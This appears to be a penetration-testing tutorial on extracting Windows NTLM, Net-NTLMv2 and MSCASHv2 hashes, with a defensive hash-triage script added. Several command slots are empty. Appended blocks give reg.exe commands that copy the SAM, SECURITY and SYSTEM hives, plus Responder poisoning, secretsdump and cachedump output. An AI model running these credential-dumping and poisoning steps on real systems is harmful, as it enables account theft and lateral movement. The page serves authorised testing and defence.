This page deals with retrieving Windows hashes (NTLM, NTLMv1/v2, MSCASHv1/v2).
Introduction
Windows hashes are the form in which Windows stores passwords on a machine. First, let's clarify the terminology.
NTLM (aka NT) hashes are local users' hashes
NTLMv1/v2 (aka Net-NTLMv1/v2) hashes are used for network authentication
MSCASHv1/v2 (aka DCCv1/v2) hashes are domain users' hashes
NTLM ≠ NTLMv1/v2 ≠ MSCASHv1/v2
Retrieve NTLM hashes
NTLM hashes are composed of two parts:
the LM hash (turned off since Windows Vista / Windows Server 2008)
the NT hash (it can stand alone; it is still called the NTLM hash)
NTLM hash
NTLM hashes are stored in the SAM database of the machine, or in the domain controller's NTDS database. Let's look at common techniques to retrieve NTLM hashes.
Dumping SAM database manually
First, get a copy of the SAM, SECURITY and SYSTEM hives:
Then retrieve the NTLM hashes with secretsdump from impacket:
Retrieve and crack NTLM hashes with Meterpreter
On local machines, simply use smart_hashdump:
On domain controllers, there are two ways to retrieve domain users' NTLM hashes:
The LSASS injection technique is not safe and must be avoided!
To crack NTLM hashes, use the John integration:
Retrieve NTLM hashes with Mimikatz
Use the following commands in Mimikatz:
These hashes are only the NT part. To get the full NTLM format, prepend the empty LM part: aad3b435b51404eeaad3b435b51404ee:<NThash>
Retrieve NTLM hashes remotely with secretsdump:
Retrieve NTDS remotely:
You can use secretsdump again:
Or CrackMapExec:
NTLM hashes can:
be used with the Pass-the-Hash technique
be cracked fairly easily
Retrieve NTLMv1/v2 hashes
NTLMv1/v2 hashes are produced by a challenge/response algorithm and are derived from the user's NT hash.
Authentication using NTLMv2
Alice accesses the share
The file server generates a challenge (a random number) and sends it to Alice
Alice sends the challenge response, computed by a function of her NT hash and the challenge
The file server asks the domain controller to perform the same computation and compare the results
The domain controller says it is OK
Alice can access the file server
NTLMv2 (aka Net-NTLMv2) hash
These hashes can be captured with tools like Responder or Inveigh:
NTLMv1/v2 hashes can:
be relayed (with tools like MultiRelay or ntlmrelayx)
be cracked in a reasonable time
NOT be used with the Pass-the-Hash technique
Retrieve MSCASHv1/v2 hashes
Let's say the machine you are trying to connect to cannot reach the domain controller for authentication because of a network outage or a domain controller shutdown. You would be stuck. To solve that problem, machines store the hashes of the last (10 by default) domain users who logged into the machine. These hashes are MSCASHv2 hashes.
Let's look at common techniques to retrieve these hashes.
Dumping SAM database manually
First, get a copy of the SAM, SECURITY and SYSTEM hives:
Then retrieve the MSCASH hashes with secretsdump from impacket:
Retrieve MSCASH hashes with Meterpreter
Simply use the cachedump Meterpreter module:
MSCASHv2 hashes can:
be cracked, but it takes quite a long time
NOT be used with the Pass-the-Hash technique
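As an added example (not code from the original page), a small Python triage helper that tells the three hash families apart by their dump-line format, applies the empty-LM prefix rule from the Mimikatz section, and reports which accounts still store an LM hash and which entries are reusable without cracking (the ones to rotate first). The sample dump lines and every hash value in them are constructed.

```python
import re
from collections import Counter

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password (LM storage off)
HEX32 = r"[0-9a-fA-F]{32}"
# secretsdump / hashdump line:  user:rid:LMhash:NThash:::
NTLM_RE = re.compile(rf"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>{HEX32}):(?P<nt>{HEX32}):::$")
# Responder / Inveigh line:     user::domain:serverchallenge:NTProofStr:blob
NETNTLMV2_RE = re.compile(r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<chal>[0-9a-fA-F]{16}):"
                          r"(?P<proof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$")
# cachedump / secretsdump line: $DCC2$[iterations]#user#hash (iteration count may be absent)
DCC2_RE = re.compile(rf"\$DCC2\$(?P<iter>\d*)#(?P<user>[^#]+)#(?P<hash>{HEX32})")

def full_ntlm(nt_hex: str) -> str:
    """Turn a bare NT hash (as Mimikatz prints it) into the LM:NT form other tools expect."""
    return f"{EMPTY_LM}:{nt_hex.lower()}"

def classify(line: str) -> dict:
    """Return the hash family and the fields a responder needs to triage one dump line."""
    line = line.strip()
    if m := NTLM_RE.match(line):
        return {"family": "NTLM", "user": m["user"], "nt": m["nt"].lower(),
                "lm_present": m["lm"].lower() != EMPTY_LM,  # LM still stored: legacy weakness
                "pass_the_hash": True}                       # reusable without cracking
    if m := NETNTLMV2_RE.match(line):
        return {"family": "Net-NTLMv2", "user": m["user"], "domain": m["domain"],
                "challenge": m["chal"].lower(), "pass_the_hash": False}  # bound to one challenge
    if m := DCC2_RE.search(line):
        return {"family": "MSCASHv2", "user": m["user"], "hash": m["hash"].lower(),
                "iterations": int(m["iter"]) if m["iter"] else 10240,  # Windows default
                "pass_the_hash": False}
    return {"family": "unknown"}

def triage(lines) -> dict:
    """Summarise a dump: counts per family, accounts with an LM hash, entries usable as-is."""
    results = [classify(l) for l in lines]
    return {"counts": dict(Counter(r["family"] for r in results)),
            "lm_enabled_users": [r["user"] for r in results if r.get("lm_present")],
            "rotate_first": [r["user"] for r in results if r.get("pass_the_hash")]}

# Constructed sample dump (all hash values are made up, not real credentials).
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "legacy:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
    "alice::CORP:1122334455667788:" + "ab" * 16 + ":0101000000000000deadbeef",
    "bob:$DCC2$10240#bob#" + "cd" * 16 + ":CORP.LOCAL:CORP",
    "[*] Dumping cached domain logon information",
]
```

Feeding a real secretsdump or cachedump output file through triage() gives an immediate view of which accounts need resetting before anything else.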
Responder output (capture referenced in the NTLMv2 section above; the captured hash is one line):
root@kali:~/Desktop# responder -I eth0
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent to 192.168.10.60 for name fileserver01
[*] [NBT-NS] Poisoned answer sent to 192.168.10.60 for name FILESERVER01 (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.10.60 for name fileserver01
[SMBv2] NTLMv2-SSP Client : 192.168.10.60
[SMBv2] NTLMv2-SSP Username : WIN01\localadmin
[SMBv2] NTLMv2-SSP Hash : localadmin::WIN01:8d58ff6cd3e9487b:E1AA44B82554D8E7BBA729FF28235D3A:0101000000000000C0653150DE09D201EB2E7F13305AD9ED000000000200080053004D004200330001001E00570049004E002D005052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000000D7C14F31E5665A6B91C0B30726F3893C57F5973CFB38D5E1EC21ED6820EB2EB0A001000000000000000000000000000000000000900220063006900660073002F00660069006C00650073006500720076006500720030003100000000000000000000000000
Copying the SAM, SECURITY and SYSTEM hives (referenced in both "Dumping SAM database manually" sections above):
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
secretsdump output on the saved hives (cached domain logon section, referenced under "Retrieve MSCASHv1/v2 hashes" above):
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
[...]
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[...]
Meterpreter cachedump module output (referenced under "Retrieve MSCASH hashes with Meterpreter" above):
meterpreter > run post/windows/gather/cachedump
[*] Executing module against CLIENT1
[*] Cached Credentials Setting: - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: /root/.msf4/loot/20140201152655_default_192.168.137.147_mscache2.creds_064400.txt
[*] John the Ripper format:
# mscash2
...
test2:$DCC2$#test2#d7f91bcdec7c0df39396b4efc81123e4:RLUNDTEST2.LOCALt:RLUNDTEST2